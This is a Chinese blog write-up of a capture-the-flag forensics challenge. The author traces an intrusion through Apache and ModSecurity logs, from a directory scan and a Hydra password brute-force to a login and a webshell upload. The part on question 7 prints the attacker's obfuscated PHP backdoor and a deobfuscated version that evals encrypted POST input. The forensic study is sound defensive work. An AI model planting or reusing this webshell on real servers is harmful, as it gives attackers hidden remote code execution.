无标签

发布日期: 2023-06-09

更新日期: 2023-06-09

文章字数: 3.5k

阅读时长: 19 分

铁人三项溯源

挂一下源博客

1，黑客攻击服务器时使用的内网ip为多少

看目录

ls -al

进去看10条

head -n 10 access_log-20230426

看100条

head -n 100 access_log-20230426

192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_scriptlibrary HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_scripts HTTP/1.1" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_source HTTP/1.1" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_src HTTP/1.1" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_stats HTTP/1.1" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_styles HTTP/1.1" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_swf HTTP/1.1" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_temp HTTP/1.1" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_tempalbums HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

flag:192.168.12.140

2，黑客嗦进行的目录扫描一共有多少条

这里一条一条的数肯定不现实，可以grep进行匹配，然后wc进行计数，匹配话，我们进行user-agent匹配，上面已经看到很多404的user-agent为”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”,我们使用命令

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

cat access_log-20230426 | grep "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" | wc -l

┌──(root㉿kali)-[~/SY_project/T3/t3]
└─# cat access_log-20230426 | grep "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" | wc -l
55510

-c # 统计字节数，或--bytes或——chars：只显示Bytes数；。
-l # 统计行数，或——lines：只显示列数；。
-m # 统计字符数。这个标志不能与 -c 标志一起使用。
-w # 统计字数，或——words：只显示字数。一个字被定义为由空白、跳格或换行字符分隔的字符串。
-L # 打印最长行的长度。
-help     # 显示帮助信息
--version # 显示版本信息

"|" 管道符
将2个命令隔开
“|”左边命令的输出就会作为“|”右边命令的输入
简单来讲就是传递作用

flag:55510

3，黑客进行账号密码爆破的次数

看 100 条

head -n 100 access_log-20230426  # 没看到啥

匹配一下://

http://192.168.12.154/index.php?c=access&a=login

抓一下 c=access&a=login

cat access_log-20230426 | grep "c=access&a=login" | wc -l

└─# cat access_log-20230426 | grep "c=access&a=login" | wc -l
4116

爆破是post请求

cat access_log-20230426 | grep "POST /index.php?c=access&a=login" | wc -l

└─# cat access_log-20230426 | grep "index.php?c=access&a=login" | wc -l
2053

先不要抓一行,抓出来看看，有什么不一样的

cat access_log-20230426 | grep "index.php?c=access&a=login"

192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:29 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "POST /index.php?c=access&a=login HTTP/1.1" 302 - "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "GET /index.php?c=access&a=index HTTP/1.1" 200 126659 "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:19 +0800] "GET /index.php?c=access&a=login HTTP/1.1" 200 5187 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"

也就是爆破得带这个 Mozilla/5.0 (Hydra)

cat access_log-20230426 | grep "Mozilla/5.0 (Hydra)" | grep "POST /index.php?c=access&a=login"

格式一样了

抓一行

cat access_log-20230426 | grep "Mozilla/5.0 (Hydra)" | grep "POST /index.php?c=access&a=login" | wc -l

└─# cat access_log-20230426 | grep "Mozilla/5.0 (Hydra)" | grep "POST /index.php?c=access&a=login" | wc -l
2051

flag:2051

4，黑客登录时使用的账号密码为多少，格式账号、密码

抓一下

cat access_log-20230426 | grep "c=access&a=login"


192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:29 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "POST /index.php?c=access&a=login HTTP/1.1" 302 - "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "GET /index.php?c=access&a=index HTTP/1.1" 200 126659 "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:19 +0800] "GET /index.php?c=access&a=login HTTP/1.1" 200 5187 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"

这一行很奇怪

192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "POST /index.php?c=access&a=login HTTP/1.1" 302 - "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

modsec_audit.log-20230426 在这个文件里查找时间 2019:16:22:34

--2d6bdf4c-A--
[04/Dec/2019:16:22:34 +0800] XedsymRc9uMOIVLA@x7DOwAAAAk 192.168.12.140 60944 192.168.12.154 80
--2d6bdf4c-B--
POST /index.php?c=access&a=login HTTP/1.1
Host: 192.168.12.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.12.154/index.php?c=access&a=login
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cookie: PHPSESSID=pc798vav3vi10j246lu3m8osr1
Connection: close
Upgrade-Insecure-Requests: 1

--2d6bdf4c-C--
login%5Busername%5D=admin&login%5Bpassword%5D=p455w0rd&configOptionSelect=Default
--2d6bdf4c-F--

flag:admin/p455w0rd

5，黑客添加的email地址为多少

抓一下

cat access_log-20230426 | grep "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
没抓到

换一个抓.com

cat access_log-20230426 | grep ".com" 
# 太多冗余了

让我们试一下正则

这个正则可以 
\.(com)+ 

cat access_log-20230426 | grep -E "\.(com)+" 
这个正则匹配的是
\.(com)+是一个正则表达式，用于匹配包含多个“com”后缀的字符串。该正则表达式的具体含义如下：

\.：表示匹配一个点号（“.”）。需要使用反斜杠进行转义，因为点号在正则表达式表示任意字符，加反斜杠转义后表示匹配真实的点号。
(com)+：表示匹配一个或多个连续的“com”字符串，可以匹配"com"、“comcom”、"comcomcom"等。
因此，该正则表达式可以匹配例如“example.com”、“www.example.com”、“foo.bar.com”、“example.com.com”等字符串。

┌──(root㉿kali)-[~/SY_project/T3/t3]
└─# cat access_log-20230426 | grep -E "\.(com)+" 
192.168.12.140 - - [04/Dec/2019:16:23:22 +0800] "GET /index.php?&ajax=true&c=contact&a=check_existing_email&email=admin%40zz.com&id_contact=&contact_type=og_1575447785_947935 HTTP/1.1" 200 212 "http://192.168.12.154/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:29:26 +0800] "GET /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a HTTP/1.1" 200 772 "http://www.google.com/url?sa=1&source=web&ct=7&url=http%3A//192.168.12.154/upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a&rct=j&q=&ei=ZWNob&usg=yg0MT&sig2=YwMik7" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es-es) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3"
192.168.12.140 - - [04/Dec/2019:16:29:46 +0800] "GET /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a HTTP/1.1" 200 772 "http://www.google.com/url?sa=1&source=web&ct=7&url=http%3A//192.168.12.154/upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a&rct=j&q=&ei=ZWNob&usg=yg1Mj&sig2=Q2Myk7" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13"

@ -> %40 url编码
flag:admin@zz.com

6，黑客第一次上传木马的绝对路径为多少，该木马未被使用

抓一下

cat access_log-20230426 | grep "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
看看黑客做了什么
192.168.12.140 - - [04/Dec/2019:16:28:56 +0800] "GET /icons/back.gif HTTP/1.1" 200 216 "http://192.168.12.154/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:28:59 +0800] "GET /upload/055/ HTTP/1.1" 200 897 "http://192.168.12.154/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:29:00 +0800] "GET /upload/055/741/ HTTP/1.1" 200 909 "http://192.168.12.154/upload/055/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:29:01 +0800] "GET /upload/055/741/33e/ HTTP/1.1" 200 952 "http://192.168.12.154/upload/055/741/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:29:01 +0800] "GET /icons/unknown.gif HTTP/1.1" 200 245 "http://192.168.12.154/upload/055/741/33e/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:29:04 +0800] "GET /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a HTTP/1.1" 200 772 "http://192.168.12.154/upload/055/741/33e/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:56 +0800] "GET /upload/ HTTP/1.1" 200 882 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:56 +0800] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://192.168.12.154/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:56 +0800] "GET /icons/back.gif HTTP/1.1" 200 216 "http://192.168.12.154/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:56 +0800] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://192.168.12.154/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:31:28 +0800] "GET /111.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

这个上传命令很奇怪
192.168.12.140 - - [04/Dec/2019:16:29:04 +0800] "GET /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a HTTP/1.1" 200 772 "http://192.168.12.154/upload/055/741/33e/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

抓一下其他

upload/055
cat access_log-20230426 | grep "upload/055"

去详细文件里看一下 (modsec_audit.log-20230426)

在文件modsec_audit.log-20230426 匹配 upload/055 只有31项

在文件modsec_audit.log-20230426 匹配 POST /upload/055 只有2项

POST /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a HTTP/1.1
Accept-Encoding: identity
Content-Length: 83
Host: 192.168.12.154
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Opera/9.25 (Windows NT 5.1; U; zh-cn)

路径 /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a
flag:/var/www/html//upload/055/741/33e/

7，黑客上传的木马方式为什么，木马密码为什么，大写字母，用空格分开

抓一下.php

cat access_log-20230426 | grep -E "\.(php)+"

192.168.12.140 - - [04/Dec/2019:16:22:38 +0800] "POST /index.php?c=gui&a=save_state HTTP/1.1" 200 16 "http://192.168.12.154/index.php?c=access&a=index" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

192.168.12.140 - - [04/Dec/2019:16:35:49 +0800] "POST /111.php HTTP/1.1" 200 52 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20061215 Red Hat/1.5.0.9-0.1.el4 Firefox/1.5.0.9"
# 发现两个 index.php 111.php

index.php 不可疑我们仔细看一下 111.php

cat access_log-20230426 | grep -E "111\.(php)+"

192.168.12.140 - - [04/Dec/2019:16:31:16 +0800] "PUT /111.php HTTP/1.1" 201 180 "-" "curl/7.63.0"
# 那么就是 PUT 传参了

分析密码

111.php

<?php
$b='="oO!tvN!y5TkuOg1fjf!";func!t!ion x($t,$k!){$c=str!len($k!);$l=s!tr';
$u=str_replace('kA','','crkAeatkAekA_fkAkAunkAction');
$F=';$j++,$i++!)!!{$o.=$t{$i}^$k{$!j};!}}!return !$o;}if (@pr!eg!!_';
$n='r=@b!ase65_en!code(!@x(@gzc!ompres!s($o),$k!));pri!nt!("$p$k!h$r$kf");}';
$S='match("/$kh(.+)$!!kf/",@file!_get_!cont!ents!("php://in!put"),$!';
$s='m)=!=2) {@ob_star!t()!;@e!val!(@gz!uncompress(@x(@ba!se64!_deco!d';
$e='e($m![2!]),$k)));!$o=@ob_get!_co!ntents(!);@ob_end!_clean!();$!';
$I='!!$k="bd377!f!17";!$kh="9d4!cd50b4843";$kf="5b!d9ce82!0!932";$p';
$H='!len($t);$o=!"";f!o!r($i=1;!$!i<$l;){for($j=0;(!$j<$c!!&&$i<$!l)';
$J=str_replace('!','',$I.$b.$H.$F.$S.$s.$e.$n);
$V=$u('',$J);$V();
echo $J;
?>

# 运行一下

$k="bd377f17";$kh="9d4cd50b4843";$kf="5bd9ce820932";$p="oOtvNy5TkuOg1fjf";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=1;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==2) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[2]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base65_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}
-----------
<?php
$k  = "bd377f17";
$kh = "9d4cd50b4843";
$kf = "5bd9ce820932";
$p = "oOtvNy5TkuOg1fjf";
function x($t, $k)
{
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 1; $i < $l;) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t{$i} ^ $k{$j};
        }
    }
    return $o;
}
if (@preg_match("/$kh(.+)$kf/", @file_get_contents("php://input"), $m) == 2) {
    @ob_start();
    @eval(@gzuncompress(@x(@base64_decode($m[2]), $k)));
    $o = @ob_get_contents();
    @ob_end_clean();
    $r = @base65_encode(@x(@gzcompress($o), $k));
    print("$p$kh$r$kf");
}
                                                                         }
# 具体解密看这篇文章 https://xz.aliyun.com/t/11246#reply-18400
# 还有一个      https://artikrh.sh/posts/weevely-backdoor-analysis.html

看下具体文件

--4b398f30-B--
POST /111.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 83
Host: 192.168.12.154
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20061215 Red Hat/1.5.0.9-0.1.el4 Firefox/1.5.0.9

--4b398f30-C--
zYgIi?{4d\>;=h'=a0b923820dccG6goLPr65AhWAlXS5IY1OHTFYFQ509a6f75849b2}Zb&G6y+(+]3VCr
--4b398f30-F--
HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.16
Content-Length: 60
Connection: close
Content-Type: text/html; charset=UTF-8

--4b398f30-E--
kbPze6iWSynLVEi5a0b923820dccG6hQVAIEgDhjN3RgPg==509a6f75849b
--4b398f30-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1575448316609856 1233 (- - -)
Stopwatch2: 1575448316609856 1233; combined=36, p1=12, p2=20, p3=1, p4=0, p5=2, sr=0, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.2 (http://www.modsecurity.org/).
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Engine-Mode: "DETECTION_ONLY"

--4b398f30-Z--

bohemian师傅说：

$kh = a0b923820dcc
$kf = 509a6f75849b
$p  = kbPze6iWSynLVEi5
$k  =

cmd5 查询

查询结果：
md5(1,32) = c4ca4238a0b923820dcc509a6f75849b
md5(1,16) = a0b923820dcc509a

flag:PUT 1

8-10

师傅没复现

hengxinyan

https://hengxinyan.github.io/2023/06/09/T3%E9%93%81%E4%B8%89%E6%BA%AF%E6%BA%90/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 hengxinyan !

无标签

格的初探

2023-08-10 hengxinyan

2023闽盾杯溯源取证

2023-06-09 hengxinyan

T3铁人三项溯源

铁人三项溯源

1，黑客攻击服务器时使用的内网ip为多少

2，黑客嗦进行的目录扫描一共有多少条

3，黑客进行账号密码爆破的次数

4，黑客登录时使用的账号密码为多少，格式账号、密码

5，黑客添加的email地址为多少

6，黑客第一次上传木马的绝对路径为多少，该木马未被使用

7，黑客上传的木马方式为什么，木马密码为什么，大写字母，用空格分开

8-10